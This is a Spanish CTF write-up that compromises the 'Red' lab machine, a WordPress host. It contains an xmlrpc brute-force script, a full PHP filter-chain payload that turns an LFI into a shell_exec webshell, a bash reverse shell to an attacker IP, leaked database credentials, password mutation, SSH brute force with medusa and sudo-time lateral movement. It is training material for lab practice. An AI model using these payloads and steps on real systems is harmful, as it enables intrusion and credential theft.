Red 1 - Writeup

Dh89Dh89
13 min read


Skills

- Virtual Hosting
- Fuzzing
- xmlrpc | Wordpress enum
- php filterchaing LFI -> RCE
- mysql enum database
- Lateral movement | Abusing time SUDO
- Abusing cron tab | Privilage escalation

Reconocimiento

Para comenzar, como siempre vamos a crearnos nuestros directorios de trabajo

$ mkdir Red            
$ cd Red 
$ mkdir nmap content exploit
ls
content  exploit  nmap

Luego vamos a proceder a escanear los servicios que se exponen atravez de los puertos de la maquina.

$ sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 192.168.0.9 -oN Allports
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2025-06-28 09:42 -03
Initiating ARP Ping Scan at 09:42
Scanning 192.168.0.9 [1 port]
Completed ARP Ping Scan at 09:42, 0.12s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:42
Scanning 192.168.0.9 [65535 ports]
Discovered open port 22/tcp on 192.168.0.9
Discovered open port 80/tcp on 192.168.0.9
Completed SYN Stealth Scan at 09:42, 6.15s elapsed (65535 total ports)
Nmap scan report for 192.168.0.9
Host is up, received arp-response (0.0054s latency).
Scanned at 2025-06-28 09:42:21 -03 for 6s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: D8:F3:BC:4D:AC:A3 (Liteon Technology)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.37 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

Como vemos, el puerto 22 y 80 estan abiertos, los cuales indican ssh y http que seguramente sea una web.

Vamos a utilzar la herramienta whatweb para ver que nos reporta.

$ whatweb 192.168.0.9
whatweb 192.168.0.9 
http://192.168.0.9 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[192.168.0.9], MetaGenerator[WordPress 5.8.1], PoweredBy[--], Script, Title[Hacked By Red – Your site has been Hacked! You’ll never find the backdoor hahahah], UncommonHeaders[link], WordPress[5.8.1]

Vemos que hay un worpress por detras, y un titulo algo llamativo.

Vamos a hecharle un vistazo a la web para ver como se ve.

Vemos una pagina que parece algo basica, pero si miramos el codigo fuente encontramos lo siguiente.

Encontramos multiples entradas de un dominio, redrocks.win, esto quiere decir, que quizas se este aplicando virtualhosting, para que nuestra maquina resuelva a esta direccion, hay que agregar la IP y el dominio a nuestro “/etc/hosts“.

$ cat /etc/hosts 
127.0.0.1    localhost
::1    localhost ip6-localhost ip6-loopback
fe00::    ip6-localnet
ff00::    ip6-mcastprefix
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
127.0.0.1    exegol-default
$ echo "192.168.0.9    redrocks.win" >> /etc/hosts            
$ cat /etc/hosts                                  
127.0.0.1    localhost
::1    localhost ip6-localhost ip6-loopback
fe00::    ip6-localnet
ff00::    ip6-mcastprefix
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
127.0.0.1    exegol-default
192.168.0.9    redrocks.win

Ahora veamos nuevamente la pagina.

Como podemos observar, la pagina ahora si nos carga correctamente.

Vamos a realizar un poco de fuzzing para ver que directorios o archivos interesantes nos encontramos.

$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.0.9/FUZZ -t 10
rss                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 121ms]
login                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 101ms]
feed                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 69ms]
0                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 158ms]
atom                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 112ms]
wp-content              [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 11ms]
admin                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 108ms]
rss2                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 127ms]
wp-includes             [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 4ms]
rdf                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 149ms]
page1                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 118ms]
'                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 105ms]
dashboard               [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 97ms]
%20                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 103ms]

Vemos muchos directorios, entre ellos un login y un wp-content, admin.

Vamos a ir revisando para ver que cosas interesantes nos encontramos.

Luego de revisar, nos encontramos que la mayoria nos redirige al login de wp-content y el resto nos descarga una extructura xml que dice lo siguiente

<?xml version="1.0" encoding="UTF-8"?><feed
    xmlns="http://www.w3.org/2005/Atom"
    xmlns:thr="http://purl.org/syndication/thread/1.0"
    xml:lang="en-US"
    xml:base="http://redrocks.win/wp-atom.php"
    >
    <title type="text">Hacked By Red</title>
    <subtitle type="text">Your site has been Hacked! You’ll never find the backdoor hahahah </subtitle>

    <updated>2021-10-31T20:13:59Z</updated>

    <link rel="alternate" type="text/html" href="http://redrocks.win" />
    <id>http://redrocks.win/feed/atom/</id>
    <link rel="self" type="application/atom+xml" href="http://redrocks.win/feed/atom/" />

    <generator uri="https://wordpress.org/" version="5.8.1">WordPress</generator>
    <entry>
        <author>
            <name>administrator</name>
                            <uri>http://10.0.2.20</uri>
                        </author>

        <title type="html"><![CDATA[Hello Blue!]]></title>
        <link rel="alternate" type="text/html" href="http://redrocks.win/2021/10/24/hello-world/" />

        <id>http://10.0.2.20/?p=1</id>
        <updated>2021-10-31T20:13:59Z</updated>
        <published>2021-10-24T14:32:37Z</published>
        <category scheme="http://redrocks.win" term="Uncategorized" />
        <summary type="html"><![CDATA[Red was here, Blue is a loser!]]></summary>

                    <content type="html" xml:base="http://redrocks.win/2021/10/24/hello-world/"><![CDATA[<p>Red was here, Blue is a loser!</p>
<p><!-- Still Looking For It? Maybe you should ask Mr. Miessler for help, not that it matters, you won't be able to read anything with it anyway --></p>
]]></content>

                    <link rel="replies" type="text/html" href="http://redrocks.win/2021/10/24/hello-world/#comments" thr:count="1" />
            <link rel="replies" type="application/atom+xml" href="http://redrocks.win/2021/10/24/hello-world/feed/atom/" thr:count="1" />
            <thr:total>1</thr:total>
            </entry>
    </feed>

Parece que existe un backdoor que podriamos utilizar para ganar acceso.

Luego de mirar un poco me encuentro un hiperviculo en un post de la pagina

La cual lleva a otra IP, sobre /wp-admin.

El cual me redirigue al tipico panel admin de worpress, lo unico que puedo comprobar es que existe el usuario administrator, debido a que devuelve una respuesta direfente.

Luego de seguir investigando me encuentro con lo siguiente.

El xmlrpc.php de los Worpress, esto sirve para enviar peticiones xml, quizas podamos estraer alguna informacion.

Intercepto la peticion con burpsuite y le doy a cambiar tipo de peticion, para tramitarlo por POST.

Enviando lo siguiente

<?xml version="1.0" encoding="utf-8"?>  
<methodCall>  
<methodName>system.listMethods</methodName>  
<params></params>  
</methodCall>

Una estructura basica, que nos permite listar todos los metodos que podemos utilizar.

Podemos intentar realizar fuerza bruta utilizando el metodo wp.getUsersBlogs (Se pueden utilizar otros metodos tambien como wp.getCategories o metaWeblog.getUsersBlogs)

Yo voy a utilizar un script en bash.

#!/usr/bin/bash

function ctrl_c(){
  echo -e "\n\n[!]Saliendo...\n"
  tput cnorm; exit 1
}
tput civis

function createXML(){
  password=$1
  xmlfile="""
<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<methodCall> 
<methodName>wp.getUsersBlogs</methodName> 
<params> 
<param><value>administrator</value></param> 
<param><value>$password</value></param> 
</params> 
</methodCall>
"""

  echo $xmlfile > file.xml

  response=$(curl -s -X POST http://192.168.0.14:/xmlrpc.php -d@file.xml)

  if [ ! "$(echo $response | grep 'Incorrect username or password')" ]; then
    echo -e "\n La password para el usuario administrator es $password"
    tput cnorm
    exit 1
  fi

}

# Ctrl_c
trap ctrl_c SIGINT

cat /usr/share/wordlists/rockyou.txt | while read password; do
  createXML $password
  tput cnorm
done

Probando varios diccionarios, no logro dar con la contraseña del administrador.

Mirando la ruta http://redrocks.win/wp-json/wp/v2/users, podemos observar una lista de usuarios disponibles, donde podemos confirmar que solo existe el user administrator.

Haciendo Fuzzing por extenciones .php veo que obtengo un internal server error

ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -u http://192.168.0.14/FUZZ -t 40 -fl 10

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.0.14/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response lines: 10
________________________________________________

NetworkFileManagerPHP.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 5807ms]

Normalmente los backdoor suelen ser del siguiente estilo: ejemplo.php?var=<comando>, por tanto ahora nos toca buscar esa variable.

Luego de varios intentos, debido a que al usar hilos o enviar multiples peticiones por mucho tiempo la maquina se colgaba, logro descubrir la variable key.

La url quedaria de la siguiente manera http://redrocks.win/NetworkFileManagerPHP.php?key

Intento ejecutar comandos, pero no me deja, hasta que pruebo apuntar un archivo y veo lo siguiente.

Por tanto, parece que tenemos un lfi (Local File Inclusion), vamos a listar.

Para ganar acesso directamente voy a utilizar de php filter chain.

Esta tecnia podria tener su poprio capitulo aparte de explicar como funciona, voy a explicarlo en resumen y si quieren, en un futuro doy una explicacion mas profunda.

Basicamente consiste en abusar en la forma de como se representan los datos en unicode segun que tipo de codificacion se utilize (ejemplo UTF-8, UTF-7, etc.)

Lo interesante aqui es que podemos ir cambiando sobre los tipos de codificacion para ir representando en la web lo que queremos, en este caso yo voy a representar una web shell sencilla de php <? php echo shell_exec($_GET[cmd])"; ?>, donde utilizamos la variable cmd, para ejecutar el comando deado.

Para hallar la sucesion de conversiones que necesito, utilizare el siguiente proyecto → php_filter_chain

El payload quedaria de la siguiente forma:

python3 php_filter_chain_generator.py --chain '<?php echo shell_exec($_GET['cmd']); ?>'
[+] The following gadget chain will generate the following code : <?php echo shell_exec($_GET[cmd]); ?> (base64 value: PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUW2NtZF0pOyA/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UTF16.EUC-JP-MS|convert.iconv.ISO-8859-1.ISO_6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

El cual si pegamos en la web y agregamos &cmd=<comando> al final, nos ejecuta el comando.

En este caso, puse whoami y vemos www-data, por tanto tenemos ejecucion de comandos, vamos a recibir una consola con pwncat.

En lugar de whoami, la siguiente linea bash -c "bash -i >%26 /dev/tcp/192.168.0.8/4443 0>%261".

pwncat-cs :4443
[17:27:33] Welcome to pwncat 🐈!                                                                       __main__.py:164
[17:27:35] received connection from 192.168.0.14:42536                                                      bind.py:84
[17:27:37] 192.168.0.14:42536: registered new host w/ db

Pwncat es una herramienta bastante fuerte, para transferir archivos y moverse entre tu maquina atacante y la victima entre otras cosas.

Escalada de Privilegios.

Ahora toca enumerar el sistema para ver que encontramos.

Revisando la ruta /var/www/wordpress, me ecuentro con el archivo de configuracion.

ls
 %26                license.txt     wp-comments-post.php    wp-includes        wp-settings.php
 %261                readme.html     wp-config-sample.php    wp-links-opml.php   wp-signup.php
'%261'$'\n'            wp-activate.php     wp-config.php        wp-load.php        wp-trackback.php
 NetworkFileManagerPHP.php   wp-admin         wp-content        wp-login.php        xmlrpc.php
 index.php            wp-blog-header.php   wp-cron.php        wp-mail.php

El cual contiene las siguientes credenciales:

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'john' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!' );

El usuario existe, por tanto voy a intentar conectarme por ssh, para ver si funciona.

Pero no, no funciona, vamos a intentar conectarnos al MYSQL para ver que encontramos

mysql -u john -p 
Enter password: # R3v_m4lwh3r3_k1nG!!
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 4906
Server version: 8.0.26-0ubuntu0.20.04.3 (Ubuntu)

Copyright (c) 2000, 2021, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
show databases();
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '()' at line 1
mysql> You will never win Blue

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| wordpress          |
+--------------------+
2 rows in set (0.14 sec)

mysql> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

mysql> select * from wp_users;
+----+---------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+---------------+
| ID | user_login    | user_pass                          | user_nicename | user_email    | user_url         | user_registered     | user_activation_key | user_status | display_name  |
+----+---------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+---------------+
|  1 | administrator | $P$BHts8T4UWtFsg2Od/BqoFMxZoktTsq. | administrator | red@rocks.com | http://10.0.2.20 | 2021-10-24 14:32:37 |                     |           0 | administrator |
+----+---------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+---------------+
1 row in set (0.00 sec)

Tenemos la clave del administrador, pero parece estar cifrada. Podriamos intentar romperla, pero como ya hicimos fuerza bruta desde antes, no creo que valga la pena.

Luego de varios intentos, se me ocurrio hacer una lista de variaciones con la pass que tenemos, esto lo podemos hacer con hascat.

hashcat --stdout pass -r /usr/share/hashcat/rules/best64.rule

R3v_m4lwh3r3_k1nG!!
!!Gn1k_3r3hwl4m_v3R
R3V_M4LWH3R3_K1NG!!
r3v_m4lwh3r3_k1nG!!
R3v_m4lwh3r3_k1nG!!0
R3v_m4lwh3r3_k1nG!!1
R3v_m4lwh3r3_k1nG!!2
R3v_m4lwh3r3_k1nG!!3
R3v_m4lwh3r3_k1nG!!4
R3v_m4lwh3r3_k1nG!!5
R3v_m4lwh3r3_k1nG!!6
R3v_m4lwh3r3_k1nG!!7
R3v_m4lwh3r3_k1nG!!8
R3v_m4lwh3r3_k1nG!!9
R3v_m4lwh3r3_k1nG!!00
R3v_m4lwh3r3_k1nG!!01
R3v_m4lwh3r3_k1nG!!02
R3v_m4lwh3r3_k1nG!!11
R3v_m4lwh3r3_k1nG!!12
R3v_m4lwh3r3_k1nG!!13
R3v_m4lwh3r3_k1nG!!21
R3v_m4lwh3r3_k1nG!!22
R3v_m4lwh3r3_k1nG!!23
R3v_m4lwh3r3_k1nG!!69
R3v_m4lwh3r3_k1nG!!77
R3v_m4lwh3r3_k1nG!!88
R3v_m4lwh3r3_k1nG!!99
R3v_m4lwh3r3_k1nG!!123
R3v_m4lwh3r3_k1nG!!e
R3v_m4lwh3r3_k1nG!!s
R3v_m4lwh3r3_k1nG!a
R3v_m4lwh3r3_k1nGs
R3v_m4lwh3r3_k1nGa
R3v_m4lwh3r3_k1nGer
R3v_m4lwh3r3_k1nGie
R3v_m4lwh3r3_k1no
R3v_m4lwh3r3_k1ny
R3v_m4lwh3r3_k1n123
R3v_m4lwh3r3_k1nman
R3v_m4lwh3r3_k1ndog
1R3v_m4lwh3r3_k1nG!!
theR3v_m4lwh3r3_k1nG!!
d3v_m4lwh3r3_k1nG!!
mav_m4lwh3r3_k1nG!!
R3v_m4lwh3r3_k1nG!!
R3v_m4lwh3r3_k1nG!!
R3v_m4lwh3r3_k1nG!!
R3_m4lwh3r3_k1nG!!
R3m4lwh3r3_k1nG!!
R3vm4lwh3r3_k1nG!!
R3v_4lwh3r3_k1nG!!
R3vm
R3v_m1
R3v_m4lwh3r3_k1nG!
R3v_m4lwh3r3_k1nG
R3v_m4lwh3r3_k1n
R3v_m4lwh3r3_k1nR3v_m4lwh3r3_k1n
Rv_m4lwh3r3_k1n
1nG!
h3r3_k1nG!!v_m4lw
R3v_m4lwh3r3_k1n!
 3v_m4lwh3r3_k1nG
G!!R3v_m4lwh3r3_k1n
nG!!
1nG!!
k1nGk1nG
n3v_
_mR_mR
Z3v_m4lwh3r3_k1nG!!
U_m4lwh3r3_k1nG!!
R3v_lw
R3vmR3vm
_mR
R3r3R3r3
Rrlw
R3v_ml
R4lwh3

Simplemente lo copiamos y pegamos en un archivo, y probamos por los usuario que disponemos.

Luego de un rato vemos lo siguiente.

medusa -M ssh -h 192.168.0.14 -u john -P passwords
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: R3v_m4lwh3r3_k1nG!! (1 of 77 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: !!Gn1k_3r3hwl4m_v3R (2 of 77 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: R3V_M4LWH3R3_K1NG!! (3 of 77 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: r3v_m4lwh3r3_k1nG!! (4 of 77 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: R3v_m4lwh3r3_k1nG!!0 (5 of 77 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.0.14 User: john Password: R3v_m4lwh3r3_k1nG!!0 [SUCCESS]

La pass parece ser R3v_m4lwh3r3_k1nG!!0, voy a conectarme por ssh para ver si funciona.

ssh john@192.168.0.14  
john@192.168.0.14's password: 
Last login: Wed Oct 27 02:05:25 2021 from 10.0.2.15
john@red:~$

Al ganar acceso como john, realizo un sudo -l para ver si tengo algun permiso.

sudo -l
Matching Defaults entries for john on red:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on red:
    (ippsec) NOPASSWD: /usr/bin/time

Esto es sencillo, podemos utilizar la pagina → gtfobins y buscar por time para hacer un movimiento lateral a ippsec.

Otra cosa que tiene esta maquina es que cada tanto te saca del servidor y no puedes usar cat para leer los archivos. Tambien nos imprime algunos mensajes por consola para molestar

Por tanto utilize less y luego me toco nueva mente utilizar medusa para encontrar la pass, luego rapidamente, convertirnos en ippsec.

sudo -u ippsec /usr/bin/time /bin/sh
$ bash
ippsec@red:/home/john$

Se me da por listar los archivos que tengo permitido como grupo.

ippsec@red:~$ find / -group ippsec 2>/dev/null | grep -v "/proc"
/var/www/wordpress/.git
/home/ippsec
/home/ippsec/.bash_logout
/home/ippsec/.profile
/home/ippsec/.bashrc
/home/ippsec/user.txt

Veo un .git algo raro, su contenido es lo siguiente.

ls -la
total 32
drwxrwx--- 2 root     ippsec    4096 Jul 22 20:56 .
drwxr-xr-x 6 www-data www-data  4096 Jul 21 20:26 ..
-rwxr-xr-x 1 root     root     16712 Jul 22 20:56 rev
-rw-r--r-- 1 root     root       123 Oct 31  2021 supersecretfileuc.c
#include <stdio.h>

int main()
{

    // prints hello world
    printf("Get out of here Blue!\n");

    return 0;
}

Ese es el contenido de arriba de supersecretfileuc.c, ese comentario me suena verlo por consola.

Por tanto me da a entender que quizas se este ejecutando cada cierto tiempo.
